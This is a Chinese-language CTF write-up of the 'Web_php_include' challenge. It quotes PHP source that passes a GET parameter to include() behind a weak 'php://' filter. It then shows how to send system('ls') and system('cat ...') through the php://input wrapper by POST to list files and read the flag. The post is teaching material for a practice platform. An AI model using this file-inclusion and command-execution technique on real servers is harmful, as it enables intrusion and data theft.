当前位置: 首页 > news >正文

Web_php_include 攻防世界

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环$page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参   

准备好一个Firefox  一个max hackbar     

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

<php
system("ls")
?>

随后得到fl4gisisish3r3.php   一般这种文件就是flag,

我们使用

<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是 


http://www.mrgr.cn/news/31685.html

相关文章:

  • 6. Python 输出长方形,直角三角形,等腰三角形
  • 【编底层原理】打开百度,输入搜索关键字,点击搜索,会发生什么,底层是如何实现的
  • PLSQL 显示行号(隔条)
  • 2024年华为杯中国研究生数学建模竞赛C题(数据驱动下磁性元件的磁芯损耗建模)思路
  • Android命令行启动settings
  • 前端框架的对比和选择
  • 快手店铺多开甜羊浏览器
  • 网络安全详解
  • 迭代器和生成器的学习笔记
  • 《让手机秒变超级电脑!ToDesk云电脑、易腾云、青椒云移动端评测》
  • 在安装软件的时候显示缺少dll文件
  • 线程安全问题
  • 2024 “华为杯” 中国研究生数学建模竞赛(C题)深度剖析|数据驱动下磁性元件的磁芯损耗建模|数学建模完整代码+建模过程全解全析
  • 用户态缓存:链式缓冲区(Chain Buffer)
  • 【python设计模式6】行为型模式1
  • 高校心理辅导:Spring Boot技术实现
  • 强化学习基础:主要算法框架与Python实现示例
  • 【高级编程】XML DOM4J解析XML文件(含案例)
  • docker之自定义镜像上传至阿里云
  • ChromaDB教程_2024最新版(下)